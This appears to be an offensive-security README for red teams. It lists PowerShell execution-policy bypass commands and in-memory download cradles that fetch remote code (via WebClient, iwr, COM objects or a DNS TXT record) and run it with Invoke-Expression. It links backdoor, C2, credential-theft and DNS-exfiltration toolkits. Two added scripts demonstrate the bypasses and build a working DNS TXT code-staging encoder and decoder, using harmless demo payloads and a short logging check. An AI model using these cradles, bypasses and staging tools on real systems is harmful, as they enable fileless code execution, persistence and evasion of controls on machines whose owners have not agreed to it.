# OffensivePowerShell
PowerShell modules and commands that come in handy for pentests and red team assessments.

## What is PowerShell Execution Policy?

PowerShell execution policies let you determine the conditions under which PowerShell loads configuration files and runs scripts.

You can set an execution policy for the local computer, for the current user, or for a particular session. You can also use a Group Policy setting to set execution policy for computers and users. The scopes are evaluated in a fixed order: MachinePolicy and UserPolicy (both Group Policy) win over Process, which wins over CurrentUser, which wins over LocalMachine.

Execution policies for the local computer and current user are stored in the registry. You do not need to set execution policies in your PowerShell profile. The execution policy for a particular session (the Process scope) is stored only in memory and is lost when the session is closed.

The execution policy is not a security system that restricts user actions. It only gates script and configuration files (`.ps1`, `.psm1`, `.ps1xml`); commands typed at the prompt or passed on the command line are never checked. For example, users can easily circumvent a policy by typing the script contents at the command line when they cannot run a script. Instead, the execution policy helps users to set basic rules and prevents them from violating them unintentionally.

## Know your current execution policy

Fire up powershell.exe and type in:

`Get-ExecutionPolicy -List`

The scopes are listed in precedence order; the first one that is not `Undefined` is the policy in effect, and `Get-ExecutionPolicy` without `-List` prints just that one.

## Bypassing PowerShell Execution Policy

Any of the following gets a script past the execution policy. They fall into a few groups: passing the code as a command rather than as a script file (3-9), overriding the policy for a new process (10-12, 17), changing the stored policy for the user or machine (14-16, 18), and disabling the check inside the running process (13). `-NoProfile`/`-nop` (1-2) only skips profile scripts; it is listed because it is usually combined with the other switches so that a profile cannot interfere. Where Group Policy sets the policy, 10-18 do not help because the MachinePolicy/UserPolicy scopes take precedence; 3-9 and 13 still work.

1. `PowerShell.exe -NoProfile`
2. `powershell -nop`
3. `Powershell -Command "Command"`
4. `Powershell -c "Command"`
5. `powershell.exe -EncodedCommand $EncodedCommand` (Base64 of the UTF-16LE command text)
6. `Invoke-Command -ScriptBlock {Command}`
7. `Invoke-Command -ComputerName Computername -ScriptBlock {Get-ExecutionPolicy} | Set-ExecutionPolicy -Force` (copies the policy of a remote host onto the local machine)
8. `Get-Content .\powershellfile.ps1 | Invoke-Expression`
9. `GC .\powershellfile.ps1 | iex`
10. `PowerShell.exe -ExecutionPolicy Bypass`
11. `PowerShell.exe -ExecutionPolicy Unrestricted`
12. `PowerShell.exe -ExecutionPolicy RemoteSigned`
13. `Disable-ExecutionPolicy` (not a built-in cmdlet: a short function that uses reflection to swap the session's `AuthorizationManager`, the object that enforces the policy, for a plain one that allows everything)
14. `Powershell.exe Set-ExecutionPolicy Bypass` (LocalMachine scope; needs administrative rights)
15. `Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned`
16. `Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted`
17. `Powershell.exe -Exec Bypass`
18. Changing the registry: set the `ExecutionPolicy` value under `HKEY_CURRENT_USER\Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell` (CurrentUser scope) or under the same path in `HKEY_LOCAL_MACHINE` (LocalMachine scope)

## Download Cradles

Each of these fetches a script over HTTP (or DNS, for the last one) and hands it straight to `Invoke-Expression`, so nothing is written to disk and the execution policy never sees a script file. Replace `path-to-pwsh-script` with the URL of the script.

Simple download cradle

`IEX (New-Object Net.WebClient).DownloadString("path-to-pwsh-script")`

Simple download cradle for PowerShell 3.0+ (`iwr` is the alias of `Invoke-WebRequest`)

`IEX (iwr 'path-to-pwsh-script')`

Hidden IE COM object (the page is fetched by an invisible Internet Explorer instance, so the request carries IE's proxy settings and user agent)

`$ie=New-Object -ComObject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('path-to-pwsh-script');Start-Sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r`

Msxml2.XMLHTTP COM object

`$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','path-to-pwsh-script',$false);$h.send();iex $h.responseText`

WinHttp COM object

`$h=New-Object -ComObject WinHttp.WinHttpRequest.5.1;$h.open('GET','path-to-pwsh-script',$false);$h.send();iex $h.responseText`

DNS TXT approach: the code to execute is stored as a Base64-encoded string in a TXT record for `SERVER`, pulled with `nslookup`, decoded and run. `Select-String` is the cmdlet that takes `-Pattern`. As written this handles a record that fits in a single TXT string (255 characters).

`IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(((nslookup -querytype=txt "SERVER" | Select-String -Pattern '"*"') -split '"'[0]))))`

## PowerShell Modules

[nishang](https://github.com/samratashok/nishang) - Offensive PowerShell for penetration testing and offensive security.

[File System Security](https://gallery.technet.microsoft.com/scriptcenter/1abd77a5-9c0b-4a2b-acef-90dbb2b84e85) - Allows much easier management of permissions on files and folders.
[PowerForensics](https://github.com/Invoke-IR/PowerForensics) - Popular live disk forensics platform for Windows.

[PowerSploit](https://github.com/PowerShellMafia/PowerSploit) - Post-exploitation framework.

[PowerShellEmpire](https://github.com/PowerShellEmpire/Empire) - Post-exploitation agent.

[PSReflect](https://github.com/mattifestation/PSReflect) - Easily define in-memory enums, structs, and Win32 functions in PowerShell.

[ADRecon](https://github.com/sense-of-security/ADRecon) - Gathers information about Active Directory and generates a report that gives a holistic picture of the current state of the target AD environment.

[BloodHound](https://github.com/BloodHoundAD/BloodHound) - Easily identify highly complex attack paths that would otherwise be impossible to quickly identify.

[Invoke-Obfuscation](https://github.com/danielbohannon/Invoke-Obfuscation) - PowerShell command and script obfuscator.

[PowerBreach](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerBreach) - A backdoor toolkit that aims to provide the user a wide variety of methods to backdoor a system.

[PowerShellArsenal](https://github.com/mattifestation/PowerShellArsenal) - A PowerShell module dedicated to reverse engineering.

[Generate-Macro](https://github.com/enigma0x3/Generate-Macro) - A PowerShell script that generates a malicious Microsoft Office document with a specified payload and persistence method.

[Invoke-AltDSBackdoor](https://github.com/enigma0x3/Invoke-AltDSBackdoor) - Obtains persistence on a Windows 7+ machine under both standard and administrative accounts by using two Alternate Data Streams.

[Powershell-C2](https://github.com/enigma0x3/Powershell-C2) - A PowerShell script to maintain persistence on a Windows machine.

[mimikittenz](https://github.com/putterpanda/mimikittenz) - A post-exploitation PowerShell tool for extracting juicy info from memory.

[InsecurePowerShell](https://github.com/cobbr/InsecurePowerShell) - PowerShell with some security features removed.

[PoshC2](https://github.com/nettitude/PoshC2) - PowerShell C2 server and implants.

[p0wnedShell](https://github.com/Cn33liz/p0wnedShell) - PowerShell Runspace post-exploitation toolkit.

[DNSExfiltrator](https://github.com/Arno0x/DNSExfiltrator) - Data exfiltration over a DNS request covert channel.

[PowerCat](https://github.com/secabstraction/PowerCat) - A PowerShell TCP/IP swiss army knife.
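## Worked example: exercising the execution policy bypasses

The following script is an added example and is not part of the OffensivePowerShell README or of any of the listed projects. It creates a throwaway `.ps1` in `$env:TEMP`, shows that a direct call is what the policy gates, and then runs the same content through several of the bypasses from the list above (8/9, 3-5, 10/17 and a Process-scope `Set-ExecutionPolicy`), finishing with the defender's view of the same activity. Assumed: Windows PowerShell 5.1, a standard (non-admin) user, no Group Policy pinning the policy, and script block logging enabled for the last step (if it is not, that step simply prints nothing).

```powershell
# Added example, not part of the OffensivePowerShell README. Exercises several of the
# bypasses listed in "Bypassing PowerShell Execution Policy" against a throwaway script
# and shows what each one relies on. Assumed: Windows PowerShell 5.1, a standard user,
# write access to $env:TEMP, and no Group Policy-enforced execution policy.

$scriptPath = Join-Path $env:TEMP 'ep-demo.ps1'
# Constructed test script: it only emits a marker line so we can tell whether it ran.
Set-Content -Path $scriptPath -Value 'Write-Output "ep-demo ran in PID $PID as $env:USERNAME"'

# Current state: the effective policy is the first scope, top to bottom, that is not Undefined.
Get-ExecutionPolicy -List | Format-Table -AutoSize | Out-Host
"Effective policy: $(Get-ExecutionPolicy)"

# 1. Only script files are gated. Under Restricted/AllSigned the direct call throws a
#    PSSecurityException; catch it so the rest of the demo still runs.
try   { & $scriptPath }
catch { Write-Warning "Direct run blocked: $($_.Exception.GetType().Name)" }

# 2. Items 8/9: the file's text is fed to Invoke-Expression, so as far as the policy
#    is concerned no script file is ever run.
Get-Content -Path $scriptPath -Raw | Invoke-Expression

# 3. Items 3-5: hand the *content* (not the path) to a child process as a command
#    string. -EncodedCommand expects Base64 of UTF-16LE text, not UTF-8.
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes((Get-Content -Path $scriptPath -Raw)))
powershell.exe -NoProfile -EncodedCommand $encoded

# 4. Items 10/17: the child process sets its own Process-scope policy, so -File is allowed.
powershell.exe -NoProfile -ExecutionPolicy Bypass -File $scriptPath

# 5. Same idea inside this session: the Process scope lives only in memory, so nothing is
#    written to the registry. Items 15/16 (-Scope CurrentUser) would instead write the
#    HKCU key named in item 18; the read below stays empty unless that has ever happened.
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass -Force
& $scriptPath
Get-ItemProperty -Path 'HKCU:\Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell' `
    -Name ExecutionPolicy -ErrorAction SilentlyContinue |
    Select-Object -ExpandProperty ExecutionPolicy

# 6. The defender's view: with script block logging enabled, every variant above still
#    lands in the PowerShell operational log as event 4104 with the script text in it.
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } `
    -MaxEvents 50 -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match 'ep-demo ran' } |
    Select-Object TimeCreated, Id -First 3

Remove-Item -Path $scriptPath -Force
```

If the machine's policy comes from Group Policy, step 4 and step 5 stop working (the MachinePolicy/UserPolicy scope still wins) while steps 2 and 3 are unaffected, which is the practical reason the list above leans on `Invoke-Expression` and `-Command` rather than on `-ExecutionPolicy`. Step 6 is the reason none of this should be mistaken for evasion: the policy is a guard rail, and the logging sits underneath it.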
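## Worked example: both halves of the DNS TXT cradle

The DNS TXT cradle above only shows the consumer side and assumes the whole script fits in one quoted string. The script below is an added example, not code from the OffensivePowerShell README or from PowerBreach: it contains an encoder that produces the record value (Base64 of the UTF-8 script, cut into the 255-character strings a TXT record is made of) and a decoder that collects every quoted string from `nslookup` output, so records spanning several strings and slightly different output layouts both work. The `nslookup` output is constructed inline, and the record name `cradle.example.test` is hypothetical; the final commented line shows the live form.

```powershell
# Added example, not part of the OffensivePowerShell README. Both halves of the DNS TXT
# cradle: the encoder that produces the record value (Base64 of the UTF-8 script, split
# into the 255-character strings a TXT record is made of) and a decoder that pulls every
# quoted string out of nslookup output, so records longer than one string still work.
# The nslookup output is constructed here; the record name cradle.example.test is made up.

function ConvertTo-TxtRecordStrings {
    param([Parameter(Mandatory)][string]$Script)
    $b64 = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($Script))
    # A TXT record is a sequence of <character-string>s of at most 255 bytes each.
    for ($i = 0; $i -lt $b64.Length; $i += 255) {
        $b64.Substring($i, [Math]::Min(255, $b64.Length - $i))
    }
}

function ConvertFrom-NslookupTxt {
    param([Parameter(Mandatory)][string]$Output)
    # nslookup prints each TXT string in double quotes; collect them all, in order,
    # instead of splitting a single line on its quotes as the one-liner does.
    $parts = [regex]::Matches($Output, '"([^"]*)"') | ForEach-Object { $_.Groups[1].Value }
    if (-not $parts) { throw 'no quoted TXT strings found in nslookup output' }
    $b64 = ($parts -join '') -replace '\s', ''
    [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($b64))
}

# --- Operator side: the script to publish (long enough to need two TXT strings) ---
$payload = @'
$who = "$env:USERDOMAIN\$env:USERNAME"
$ver = $PSVersionTable.PSVersion.ToString()
$pol = Get-ExecutionPolicy
Write-Output "hello from a TXT record: user $who, PowerShell $ver, execution policy $pol, PID $PID"
'@
$strings = @(ConvertTo-TxtRecordStrings -Script $payload)
"Publish {0} TXT string(s) for the record:" -f $strings.Count
$strings | ForEach-Object { '  "' + $_ + '"' }

# --- Target side: constructed nslookup output for the hypothetical record -----------
$recordLine = ($strings | ForEach-Object { '"' + $_ + '"' }) -join ' '
$fakeNslookup = @"
Server:  UnKnown
Address:  10.0.0.53

Non-authoritative answer:
cradle.example.test     text =

        $recordLine
"@

$decoded = ConvertFrom-NslookupTxt -Output $fakeNslookup
if ($decoded -ne $payload) { throw 'round trip failed' }
Invoke-Expression $decoded

# Live form once the record exists (nslookup writes its banner to stderr, hence 2>&1):
#   ConvertFrom-NslookupTxt -Output ((nslookup -querytype=txt cradle.example.test 2>&1) -join "`n") | Invoke-Expression
```

Two things are worth noticing. The split into 255-character strings is not optional: a zone will not accept a longer single string, and a resolver returns the pieces as separate quoted strings, which is exactly the case the original one-liner's `-split '"'[0]` does not handle. And because the decoder strips whitespace before `FromBase64String`, it is indifferent to whether `nslookup` puts all strings on one line or wraps them.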